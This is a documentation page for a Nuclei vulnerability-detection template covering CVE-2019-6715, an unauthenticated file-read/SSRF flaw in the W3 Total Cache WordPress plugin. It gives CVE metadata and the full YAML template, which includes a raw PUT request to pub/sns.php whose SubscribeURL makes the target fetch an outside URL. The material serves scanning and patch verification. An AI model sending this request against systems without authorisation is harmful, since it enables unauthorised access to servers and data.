W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
ID: CVE-2019-6715
Severity: high
Author: randomrobbie
Tags: cve,cve2019,wordpress,wp-plugin,ssrf,packetstorm,intrusive,boldgrid
Description
Section titled “Description”WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
YAML Source
Section titled “YAML Source”id: CVE-2019-6715
info: name: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal author: randomrobbie severity: high description: | WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php. impact: | An unauthenticated attacker can read sensitive files or traverse directories on the target system, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of W3 Total Cache plugin (0.9.3 or higher) to mitigate the vulnerability. reference: - https://vinhjaxt.github.io/2019/03/cve-2019-6715 - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html - https://nvd.nist.gov/vuln/detail/CVE-2019-6715 - https://github.com/sobinge/nuclei-templates - https://github.com/random-robbie/cve-2019-6715 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-6715 epss-score: 0.3388 epss-percentile: 0.97075 cpe: cpe:2.3:a:boldgrid:w3_total_cache:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: boldgrid product: w3_total_cache framework: wordpress tags: cve,cve2019,wordpress,wp-plugin,ssrf,packetstorm,intrusive,boldgrid
http: - raw: - | PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}
matchers: - type: word part: body words: - TmVzc3VzQ29kZUV4ZWNUZXN0# digest: 4a0a00473045022100bd32588a5a57ebee17f214b231c16e3106b611e8c9c8cf3cf60d0d96bfb01def022013efe9c0fe755233dcb9653fe103bc92183e73d34084575f8903f31b91be3060:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-6715.yaml"